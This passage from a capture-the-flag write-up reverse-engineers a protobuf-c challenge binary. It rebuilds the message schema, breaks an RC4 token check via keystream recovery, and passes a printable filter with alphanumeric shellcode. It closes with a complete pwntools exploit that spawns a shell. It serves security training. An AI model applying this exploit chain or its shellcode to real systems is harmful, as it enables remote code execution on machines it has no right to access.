.data.rel.ro:0000000000004C6C 00                             db    0
.data.rel.ro:0000000000004C6D 00                             db    0
.data.rel.ro:0000000000004C6E 00                             db    0
.data.rel.ro:0000000000004C6F 00                             db    0
.data.rel.ro:0000000000004C70 04                             db    4
.data.rel.ro:0000000000004C71 00                             db    0
.data.rel.ro:0000000000004C72 00                             db    0
.data.rel.ro:0000000000004C73 00                             db    0
.data.rel.ro:0000000000004C74 00                             db    0
.data.rel.ro:0000000000004C75 00                             db    0
.data.rel.ro:0000000000004C76 00                             db    0
.data.rel.ro:0000000000004C77 00                             db    0
.data.rel.ro:0000000000004C78 20 4B 00 00 00dq offset off_4B20      ; "giaoid"
.data.rel.ro:0000000000004C80 10 31 00 00 00dq offset unk_3110
.data.rel.ro:0000000000004C88 01                             db    1
.data.rel.ro:0000000000004C89 00                             db    0
.data.rel.ro:0000000000004C8A 00                             db    0
.data.rel.ro:0000000000004C8B 00                             db    0
.data.rel.ro:0000000000004C8C 00                             db    0
.data.rel.ro:0000000000004C8D 00                             db    0
.data.rel.ro:0000000000004C8E 00                             db    0
.data.rel.ro:0000000000004C8F 00                             db    0
.data.rel.ro:0000000000004C90 20 31 00 00 00dq offset unk_3120
.data.rel.ro:0000000000004C98 04 20 00 00 00dq offset sub_2004
.data.rel.ro:0000000000004CA0 00 00 00 00 00…                align 40h
.data.rel.ro:0000000000004CC0 40 4C 00 00 00dq offset unk_4C40
...

Paired with:

IDA
.rodata:0000000000003110 unk_3110 db   2,0,0,0,  0,0,0,0,  1,0,0,0,  3,0,0,0
.rodata:0000000000003120 unk_3120 db   1,0,0,0,  0,0,0,0,  0,0,0,0,  4,0,0,0

.rodata:0000000000003130 aGiaoMsgiao     db 'giao.msgiao',0
.rodata:000000000000313C aMsgiao         db 'Msgiao',0
.rodata:0000000000003143 aGiaoMsgiao_0   db 'Giao__Msgiao',0
.rodata:0000000000003150 aGiao           db 'giao',0

At off_4B20 holds the C array of ProtobufCFieldDescriptor entries:

IDA
.data.rel.ro:0000000000004B20 E6 30 00 00 00 off_4B20        dq offset aGiaoid       ; DATA XREF: .data.rel.ro:0000000000004C78↓o
.data.rel.ro:0000000000004B20 00 00 00                                               ; "giaoid"
.data.rel.ro:0000000000004B28 01                             db    1
.data.rel.ro:0000000000004B29 00                             db    0
.data.rel.ro:0000000000004B2A 00                             db    0
...
.data.rel.ro:0000000000004B68 ED 30 00 00 00dq offset aGiaosize     ; "giaosize"
.data.rel.ro:0000000000004B70 02                             db    2
.data.rel.ro:0000000000004B71 00                             db    0
.data.rel.ro:0000000000004B72 00                             db    0
...
.data.rel.ro:0000000000004BB0 F6 30 00 00 00dq offset aGiaocontent  ; "giaocontent"
.data.rel.ro:0000000000004BB8 03                             db    3
.data.rel.ro:0000000000004BB9 00                             db    0
.data.rel.ro:0000000000004BBA 00                             db    0
...
.data.rel.ro:0000000000004BF8 02 31 00 00 00dq offset aGiaotoken    ; "giaotoken"
.data.rel.ro:0000000000004C00 04                             db    4
.data.rel.ro:0000000000004C01 00                             db    0
...
.data.rel.ro:0000000000004C3F 00                             db    0

We can regenerate the .proto definition using automated tooling, or craft one ourselves once we've extracted the full message-descriptor data from memory. For the sake of practice, we'll continue with a manual reconstruction.

The dump shows 4 descriptors back-to-back, each 0x48 bytes apart:

  • 0x4B20 – field 1: giaoid
  • 0x4B68 – field 2: giaosize
  • 0x4BB0 – field 3: giaocontent
  • 0x4BF8 – field 4: giaotoken

Take a detailed analysis on the first one:

IDA
.data.rel.ro:0000000000004B20 off_4B20 dq offset aGiaoid      ; name = "giaoid"
.data.rel.ro:0000000000004B28          dd 1                   ; id
.data.rel.ro:0000000000004B2C          dd 3                   ; label
.data.rel.ro:0000000000004B30          dd 3                   ; type
.data.rel.ro:0000000000004B34          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004B38          dd 18h                 ; offset
.data.rel.ro:0000000000004B3C          dq 0                   ; descriptor
.data.rel.ro:0000000000004B44          dq 0                   ; default_value
.data.rel.ro:0000000000004B4C          dq 0                   ; field_range
.data.rel.ro:0000000000004B54          dq 0                   ; flags / padding

label = 3PROTOBUF_C_LABEL_NONE (proto3-style "no label", effectively optional, no separate has_*):

C
typedef enum {
    PROTOBUF_C_LABEL_REQUIRED = 0,
    PROTOBUF_C_LABEL_OPTIONAL = 1,
    PROTOBUF_C_LABEL_REPEATED = 2,
    PROTOBUF_C_LABEL_NONE     = 3
} ProtobufCLabel;

type = 3PROTOBUF_C_TYPE_INT64:

C
typedef enum {
    PROTOBUF_C_TYPE_INT32    = 0,
    PROTOBUF_C_TYPE_SINT32   = 1,
    PROTOBUF_C_TYPE_SFIXED32 = 2,
    PROTOBUF_C_TYPE_INT64    = 3,
    // ...
    PROTOBUF_C_TYPE_BYTES    = 15,
    PROTOBUF_C_TYPE_MESSAGE  = 16
} ProtobufCType;

So this means:

Field 1 – at 0x4B20:

  • name: giaoid
  • tag number: 1
  • label: NONE (proto3-ish optional)
  • type: int64
  • C struct offset: 0x18

Field 2 – at 0x4B68:

IDA
.data.rel.ro:0000000000004B68          dq offset aGiaosize    ; name = "giaosize"
.data.rel.ro:0000000000004B70          dd 2                   ; id
.data.rel.ro:0000000000004B74          dd 3                   ; label
.data.rel.ro:0000000000004B78          dd 3                   ; type
.data.rel.ro:0000000000004B7C          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004B80          dd 20h                 ; offset
.data.rel.ro:0000000000004B84          dq 0                   ; descriptor
.data.rel.ro:0000000000004B8C          dq 0                   ; default_value
.data.rel.ro:0000000000004B94          dq 0                   ; field_range
.data.rel.ro:0000000000004B9C          dq 0                   ; flags / padding
  • name: giaosize
  • tag: 2
  • label: NONE
  • type: int64
  • offset: 0x20

Field 3 – at 0x4BB0:

IDA
.data.rel.ro:0000000000004BB0          dq offset aGiaocontent ; name = "giaocontent"
.data.rel.ro:0000000000004BB8          dd 3                   ; id
.data.rel.ro:0000000000004BBC          dd 3                   ; label
.data.rel.ro:0000000000004BC0          dd 0Fh                 ; type
.data.rel.ro:0000000000004BC4          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004BC8          dd 28h                 ; offset
.data.rel.ro:0000000000004BCC          dq 0                   ; descriptor
.data.rel.ro:0000000000004BD4          dq 0                   ; default_value
.data.rel.ro:0000000000004BDC          dq 0                   ; field_range
.data.rel.ro:0000000000004BE4          dq 0                   ; flags / padding

type = 0x0FPROTOBUF_C_TYPE_BYTES (15)

  • name: giaocontent
  • tag: 3
  • label: NONE
  • type: bytes
  • offset: 0x28

Field 4 – at 0x4BF8:

IDA
.data.rel.ro:0000000000004BF8          dq offset aGiaotoken   ; name = "giaotoken"
.data.rel.ro:0000000000004C00          dd 4                   ; id
.data.rel.ro:0000000000004C04          dd 3                   ; label
.data.rel.ro:0000000000004C08          dd 0Fh                 ; type
.data.rel.ro:0000000000004C0C          dd 0                   ; quantifier_offset
.data.rel.ro:0000000000004C10          dd 38h                 ; offset
.data.rel.ro:0000000000004C14          dq 0                   ; descriptor
.data.rel.ro:0000000000004C1C          dq 0                   ; default_value
.data.rel.ro:0000000000004C24          dq 0                   ; field_range
.data.rel.ro:0000000000004C2C          dq 0                   ; flags / padding
  • name: giaotoken
  • tag: 4
  • label: NONE
  • type: bytes
  • offset: 0x38

From the message descriptor chunk shown before:

  • full name: "giao.msgiao"
  • short C name: "Msgiao"
  • C type name: "Giao__Msgiao"
  • package: "giao"

So the proto message looks like this in high-level form:

proto
syntax = "proto3";

package giao;

message Msgiao {
    int64  giaoid      = 1;
    int64  giaosize    = 2;
    bytes  giaocontent = 3;
    bytes  giaotoken   = 4;
}

We must accurately pair each field’s tag and wire type with the reversed ProtobufCFieldDescriptor entries, while the name only needs to align with what appears in the source or in the exploit script. The package name (giao) and message type name (Msgiao) are arbitrary — they can be renamed or replaced entirely.

We can choose to define the schema using either the legacy proto2 / proto3 syntax, or adopt the newer edition = ... format introduced in Protobuf Editions, applying the appropriate grammar.

Once we reconstruct the pwn.proto file, generate Python bindings with:

Bash
protoc --python_out ./ pwn.proto

These bindings can then be imported directly into our exploit script for message crafting.

3.2.2.4 C Structure Recovery

Given the offsets:

  • 0x18giaoid
  • 0x20giaosize
  • 0x28giaocontent
  • 0x38giaotoken

…and knowing protobuf-c always starts messages with a ProtobufCMessage base, we can reverse the layout as:

IDA local type
struct ProtobufCMessage {
  void *descriptor;              
  unsigned __int64 n_unknown_fields; 
  void *unknown_fields;          
};                               

struct ProtobufCBinaryData {
  unsigned __int64 len;          
  char *data;                    
};                               

struct Msgiao {
    ProtobufCMessage    base;          // at 0x00, size 0x18 on 64-bit (descriptor ptr + n_unknown + unknown_fields)
    int64_t             giaoid;        // at 0x18
    int64_t             giaosize;      // at 0x20
    ProtobufCBinaryData giaocontent;   // at 0x28  (struct { size_t len; uint8_t *data; })
    ProtobufCBinaryData giaotoken;     // at 0x38
};

Import the generated types into IDA as local structures (Shift + F1). Then press "Y" on the global pointer qword_5058 — which holds the parsed protobuf message — and set its type to Msgiao *.

With that in place, the decompiled backdoor function sub_1D96 becomes immediately readable:

pwn_protobuf_23

The rest is just trivial.

3.2.2.5 Custom RC4 Encryption

To reach arbitrary code execution, we must bypass a check on the giaotoken field — gated by a custom RC4-based function:

C
_BOOL8 __fastcall my_rc4(const char *input_token)
{
  size_t v1; // rax
  int i; // [rsp+18h] [rbp-258h]
  int len_s; // [rsp+1Ch] [rbp-254h]
  char s[8]; // [rsp+20h] [rbp-250h] BYREF
  unsigned __int64 v6; // [rsp+28h] [rbp-248h]
  unsigned __int64 v7; // [rsp+30h] [rbp-240h]
  unsigned __int64 v8; // [rsp+38h] [rbp-238h]
  int v9; // [rsp+40h] [rbp-230h]
  _QWORD key[32]; // [rsp+50h] [rbp-220h] BYREF
  _WORD state[12]; // [rsp+150h] [rbp-120h] BYREF
  __int64 v12; // [rsp+168h] [rbp-108h]
  __int64 v13; // [rsp+170h] [rbp-100h]
  __int64 v14; // [rsp+178h] [rbp-F8h]
  __int64 v15; // [rsp+180h] [rbp-F0h]
  __int64 v16; // [rsp+188h] [rbp-E8h]
  __int64 v17; // [rsp+190h] [rbp-E0h]
  __int64 v18; // [rsp+198h] [rbp-D8h]
  __int64 v19; // [rsp+1A0h] [rbp-D0h]
  __int64 v20; // [rsp+1A8h] [rbp-C8h]
  __int64 v21; // [rsp+1B0h] [rbp-C0h]
  __int64 v22; // [rsp+1B8h] [rbp-B8h]
  __int64 v23; // [rsp+1C0h] [rbp-B0h]
  __int64 v24; // [rsp+1C8h] [rbp-A8h]
  __int64 v25; // [rsp+1D0h] [rbp-A0h]
  __int64 v26; // [rsp+1D8h] [rbp-98h]
  __int64 v27; // [rsp+1E0h] [rbp-90h]
  __int64 v28; // [rsp+1E8h] [rbp-88h]
  __int64 v29; // [rsp+1F0h] [rbp-80h]
  __int64 v30; // [rsp+1F8h] [rbp-78h]
  __int64 v31; // [rsp+200h] [rbp-70h]
  __int64 v32; // [rsp+208h] [rbp-68h]
  __int64 v33; // [rsp+210h] [rbp-60h]
  __int64 v34; // [rsp+218h] [rbp-58h]
  __int64 v35; // [rsp+220h] [rbp-50h]
  __int64 v36; // [rsp+228h] [rbp-48h]
  __int64 v37; // [rsp+230h] [rbp-40h]
  __int64 v38; // [rsp+238h] [rbp-38h]
  __int64 v39; // [rsp+240h] [rbp-30h]
  __int64 v40; // [rsp+248h] [rbp-28h]
  unsigned __int64 v41; // [rsp+258h] [rbp-18h]

  v41 = __readfsqword(0x28u);
  memset(key, 0, sizeof(key));
  strcpy((char *)state, "114514giaogiaogiao99");
  HIBYTE(state[10]) = 0;
  state[11] = 0;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 0;
  v16 = 0;
  v17 = 0;
  v18 = 0;
  v19 = 0;
  v20 = 0;
  v21 = 0;
  v22 = 0;
  v23 = 0;
  v24 = 0;
  v25 = 0;
  v26 = 0;
  v27 = 0;
  v28 = 0;
  v29 = 0;
  v30 = 0;
  v31 = 0;
  v32 = 0;
  v33 = 0;
  v34 = 0;
  v35 = 0;
  v36 = 0;
  v37 = 0;
  v38 = 0;
  v39 = 0;
  v40 = 0;
  *(_QWORD *)s = 0xB95FA87BA6AF366ALL;
  v6 = 0x918D1C0CC7837D63LL;
  v7 = 0xF877F9B36B6EF2D3LL;
  v8 = 0x8EFDECFCE888E2BFLL;
  v9 = 0x40FE92FD;
  len_s = strlen(s);
  v1 = strlen((const char *)state);
  rc4_init((__int64)key, (__int64)state, v1);   // KSA
  rc4_enc((__int64)key, (__int64)input_token, len_s, (__int64)state);
  for ( i = 0; i < strlen(input_token); ++i )
    ;
  return strcmp(input_token, s) == 0;
}

At first glance, it's unmistakably one of those classic RC4 password-check routines buried inside a cursed decompilation artifact.

The encryption logic unfolds as follows:

C
strcpy((char *)state, "114514giaogiaogiao99");
v1 = strlen(state);
rc4_init(key, state, v1);
rc4_enc(key, input_token, len_s, state);
return strcmp(input_token, s) == 0;

Breakdown of the flow:

  1. Copies a fixed key string "114514giaogiaogiao99" into state.
  2. Initializes the RC4 state using rc4_init().
  3. Encrypts the input token in place using rc4_enc().
  4. Compares the result against a hardcoded ciphertext buffer s.

Stream Cipher Logic

This is RC4 — symmetric and stateless across each run:

  • cipher = plaintext ⊕ keystream
  • plaintext = cipher ⊕ keystream

Which means:

We don't need to dissect the routine itself. All that matters is extracting the keystream, then XOR-ing it with the fixed ciphertext to recover the expected giaotoken. The RC4 key 114514giaogiaogiao99 is irrelevant for our purposes — it's fixed, deterministic, and contributes no additional mystery.

The constants for s (0xB95F..., v6, v7, v8, v9) are just the compiler laying down a long constant byte string in locals. IDA split it into _QWORD locals,

  • s at [rbp-0x250] (8 bytes)
  • v6 at [rbp-0x248] (8 bytes) → s + 8
  • v7 at [rbp-0x240] (8 bytes) → s + 16
  • v8 at [rbp-0x238] (8 bytes) → s + 24
  • v9 at [rbp-0x230] (4 bytes) → s + 32

These form a 36-byte RC4 ciphertext block in memory:

[s[0..7]] [s[8..15]] [s[16..23]] [s[24..31]] [s[32..35]]

All are stored little-endian. A quick Python snippet reconstructs the full ciphertext (s):

Python
vals = [
    0xB95FA87BA6AF366A,  # _QWORD s[0..7]
    0x918D1C0CC7837D63,  # v6
    0xF877F9B36B6EF2D3,  # v7
    0x8EFDECFCE888E2BF,  # v8
    0x40FE92FD,          # v9 (dword)
]

ct  = b""
ct += vals[0].to_bytes(8, "little")
ct += vals[1].to_bytes(8, "little")
ct += vals[2].to_bytes(8, "little")
ct += vals[3].to_bytes(8, "little")
ct += vals[4].to_bytes(4, "little")

print("[+] Ciphertext len:", len(ct))
print("[+] Ciphertext hex:", ct.hex())

Or dump directly via GDB

rdi = 0x88513fd5d15b4805
rsi = giaotoken
rdx = 0x26  ; len_s
rcx = '114514giaogiaogiao99'

$ pwndbg> x/s 0x7ffe3dfba680
0x7ffe3dfba680: "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\376\177"

$ pwndbg> x/39x 0x7ffe3dfba680
0x7ffe3dfba680: 0x6a    0x36    0xaf    0xa6    0x7b    0xa8    0x5f    0xb9
0x7ffe3dfba688: 0x63    0x7d    0x83    0xc7    0x0c    0x1c    0x8d    0x91
0x7ffe3dfba690: 0xd3    0xf2    0x6e    0x6b    0xb3    0xf9    0x77    0xf8
0x7ffe3dfba698: 0xbf    0xe2    0x88    0xe8    0xfc    0xec    0xfd    0x8e
0x7ffe3dfba6a0: 0xfd    0x92    0xfe    0x40    0xfe    0x7f    0x00

Tip: Utilities like Pwndbg's dump memory <output_file> <start_addr> <end_addr> command make this extraction pleasantly trivial.

Exploit Strategy: Stream Cipher Trick

Since the encryption is deterministic and key is static, we apply the textbook RC4 stream cipher recovery:

  1. Send a known dummy plaintext of same length as s
  2. Observe the resulting ciphertext
  3. Derive the keystream: keystream = ciphertext ⊕ plaintext
  4. XOR the keystream with the known ciphertext s to recover the expected giaotoken

This gives us a valid token that passes the strcmp(). At that point, the RC4 check is defeated — and we control the giaotoken field with a valid value.

3.2.2.6 Alphanumeric Shellcode

After bypassing the RC4 check with a valid giaotoken, the next barrier is the chk_content routine, which filters giaocontent:

C
__int64 __fastcall chk_content(__int64 a1, unsigned int a2)
{
  unsigned int v3;
  unsigned int i;

  v3 = a2;

  // 1) Strip trailing '\n' if present
  if ( *(_BYTE *)(a2 - 1 + a1) == '\n' )
  {
    *(_BYTE *)(a2 - 1 + a1) = 0;
    v3 = a2 - 1;
  }

  // 2) Check every byte for "printable" constraint
  for ( i = 0; ; ++i )
  {
    if ( v3 <= i )
      break;

    // Reject any control character (<= 0x1F) or DEL (0x7F)
    if ( *(char *)((int)i + a1) <= 0x1F || *(_BYTE *)((int)i + a1) == 0x7F )
    {
      puts("Oops!");
      exit(0);
    }
  }
  return i;
}

In short: Payload must consist only of printable ASCII characters (0x20–0x7E) — anything outside that range is rejected.

  • Control characters (\0, \n, \r, \t, etc.) = exit(0)
  • 0x7F (DEL) = also rejected
  • One optional trailing \n is stripped, so we can afford to end with it

This is a standard "sanitize user input" guard:

"Make sure the payload looks normal."

To bypass it, we construct our payload using alphanumeric shellcode — a self-decoding payload that consists of only printable characters.

Example: ae64 Encoder

We can use ae64 to generate an alphanumeric version of shellcraft.sh():

Python
from pwn import *
from ae64 import AE64

context(arch='amd64', os='linux')

sc = AE64().encode(asm(shellcraft.sh()), strategy='small')
print(sc)

Example output:

[+] prologue generated
[+] encoded shellcode generated
[*] build decoder, try free space: 54 ...
[*] build decoder, try free space: 186 ...
[+] Alphanumeric shellcode generate successfully!
[+] Total length: 185

b'WTYH39YjoTYfi9pYWZjWTYfi9sO0t800T8U0T8Vj3TYfi9GF0t800T8KHc1jgTYfi1kcLJt03jhTYfi1OlVYIJ4NVTXAkv21B2t11A0v1IoVL90uzDjFzvsdked5AFPk2LF6ioJB0ddTTZ5vPnnkTFcpYBbFWDiF0AqAoNUp4hK73SE1rf539fWyD'

Other Alphanumeric Shellcode Options

Other encoders work as well:

  • alpha3 — classic alphanumeric shellcode builder
  • pwnkit — personal encoder module with multiple encoding strategies
  • [msfvenom -e x86/alpha_mixed] — only works for 32-bit cases

3.2.2.7 ret2shellcode

This is the whole punchline of the challenge, waiting for us at the destination:

C
// shellcode injection
memcpy(dest, Msgiao->giaocontent.data, Msgiao->giaocontent.len);
((void (*)(void))dest)();  // code execution

Msgiao->giaocontent.data from the protobuf message field giaocontent is copied by memcpy(dest, ..., len); into some buffer dest. And ((void (*)(void))dest)(); is a cast-to-function-pointer and call:

  • (void (*)(void))dest → treat dest as "pointer to a function taking no args, returning void".
  • dest stores the attacker controlled shellcode, locates at the executable mapping .bss.
  • (... )();jump to that address and execute it.

So, in plain words:

"Take the bytes from Msgiao.giaocontent, copy them into executable memory at dest, and then jump there and run them as code."

All the RC4 quirks, protobuf descriptor oddities, and the chk_content printable filter are merely constraints on what we’re permitted to embed inside the Msgiao protocol buffer. (And yes, the trivial magic values for giaoid and giaoname need no sermon.)

This is the real payload delivery vector — the moment where it devolves into a clean ret2shellcode primitive.

3.2.3 Exploit

The final exploit chain in summary:

  • Leak PIE → compute base address.
  • Send the pointer to "yes" so chk_token passes.
  • Recover RC4 keystream → forge a valid giaotoken.
  • Encode /bin/sh with AE64 so it passes the printable-only filter.
  • Build a protobuf Msgiao containing:
    • giaoid (0x114514), giaosize (0x415411)
    • forged giaotoken
    • ASCII-safe encoded shellcode in giaocontent
  • Send serialized protobuf.
  • Program copies giaocontent into executable memory and jumps to it → shell.

The proto:

proto
syntax = "proto3";

package giao;

message Msgiao {
    int64  giaoid      = 1;
    int64  giaosize    = 2;
    bytes  giaocontent = 3;
    bytes  giaotoken   = 4;
}

Compile to generate pwn_pb2.py:

Bash
protoc --python_out=. pwn.proto

Exploit script:

Python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Title : Linux Pwn Exploit
# Author: Axura (@4xura) - https://4xura.com
#
# Description:
# ------------
# A Python exp for Linux binex interaction
#
# Usage:
# ------
# - Local mode  : ./xpl.py
# - Remote mode : ./xpl.py [ <HOST> <PORT> | <HOST:PORT> ]
#

from pwnkit import *
from pwn import *
import sys

# CONFIG
# ---------------------------------------------------------------------------
BIN_PATH = "./pwn"
LIBC_PATH = None
host, port = load_argv(sys.argv[1:])
ssl = False
env = {}
elf = ELF(BIN_PATH, checksec=False)
libc = ELF(LIBC_PATH) if LIBC_PATH else None

Context("amd64", "linux", "little", "debug", ("tmux", "splitw", "-h")).push()
io = Config(BIN_PATH, LIBC_PATH, host, port, ssl, env).run()
alias(io)  # s, sa, sl, sla, r, rl, ru, uu64, g, gp


# EXPLOIT
# ---------------------------------------------------------------------------
def exploit(*args, **kwargs):
    # --- Leak Memory
    ru("\n")
    sl("1337")

    ru("\n")
    sl("254")

    elf_base = int(r(14), 16) - 0x5008
    pa(elf_base)

    yes_addr = elf_base + 0x3041
    pa(yes_addr)
    sl(hex(yes_addr))

    # --- Construct Protobuf Message
    import pwn_pb2

    msg = pwn_pb2.Msgiao()

    """
    Magic
    """
    msg.giaoid = 0x114514
    msg.giaosize = 0x415411

    """
    RC4 token
    rdi = 0x88513fd5d15b4805
    rsi = giaotoken
    rdx = 0x26  ; len_s
    rcx = '114514giaogiaogiao99'

    pwndbg> x/s 0x7ffe3dfba680
    0x7ffe3dfba680: "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\376\177"

    pwndbg> x/39x 0x7ffe3dfba680
    0x7ffe3dfba680: 0x6a    0x36    0xaf    0xa6    0x7b    0xa8    0x5f    0xb9
    0x7ffe3dfba688: 0x63    0x7d    0x83    0xc7    0x0c    0x1c    0x8d    0x91
    0x7ffe3dfba690: 0xd3    0xf2    0x6e    0x6b    0xb3    0xf9    0x77    0xf8
    0x7ffe3dfba698: 0xbf    0xe2    0x88    0xe8    0xfc    0xec    0xfd    0x8e
    0x7ffe3dfba6a0: 0xfd    0x92    0xfe    0x40    0xfe    0x7f    0x00
    """
    # s = "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@\375\177"
    s = "j6\257\246{\250_\271c}\203\307\f\034\215\221\323\362nk\263\371w\370\277\342\210\350\374\354\375\216\375\222\376@"
    ct = s.encode("latin1")
    print(
        "[DBG] Expected ciphertext: {},\n\t\tlenght of ciphertext: {}".format(
            ct, len(ct)
        )
    )

    test_p = b"T" * len(ct)
    # msg.giaotoken = test_p
    """
    # test = "\006U\237\226\030\304n\334\032\020\347\241me\355\241\262\221\027\006\204\237F\201߇䊘\200\313\351ˤ\317u"
    pwndbg> dump memory ./test.bin 0x64e3eadf62f0 0x64e3eadf62f0+36
    """
    with open("./test.bin", "rb") as f:
        test_ct = f.read()

    print(
        "[DBG] Test ciphertext: {},\n\t\tlenght of ciphertext: {}".format(
            test_ct, len(test_ct)
        )
    )

    ks = xor(test_ct, test_p)
    msg.giaotoken = xor(ct, ks)

    """
    Alpha shellcode
    """
    from ae64 import AE64

    sc = asm(shellcraft.sh())
    # sc = (
        # asm(shellcraft.open("flag", 0))
        # + asm(shellcraft.read("rax", "rsp", 0x100))
        # + asm(shellcraft.write(1, "rsp", 0x100))
    # )
    enc_sc = AE64().encode(sc, strategy="small")
    # enc_sc = b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2E0T2I0Q030z3P3G1P3r123V2p01187l0B0y3I3d0C3a133q3p03084y3G7n7m1m0m0o0s3r8O02114z4B0Z0B0k0n0403'
    print("[DBG] Encoded shellcode: {}\n\tLength: {}".format(enc_sc, len(enc_sc)))

    msg.giaocontent = enc_sc

    # --- Fire
    pl = msg.SerializeToString()
    sa(b"your giao: ", pl)

    # pause()
    io.interactive()


# PIPELINE
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    exploit()

Pwned:

pwn_protobuf_24

#define LABYRINTH (void *)alloc_page(GFP_ATOMIC)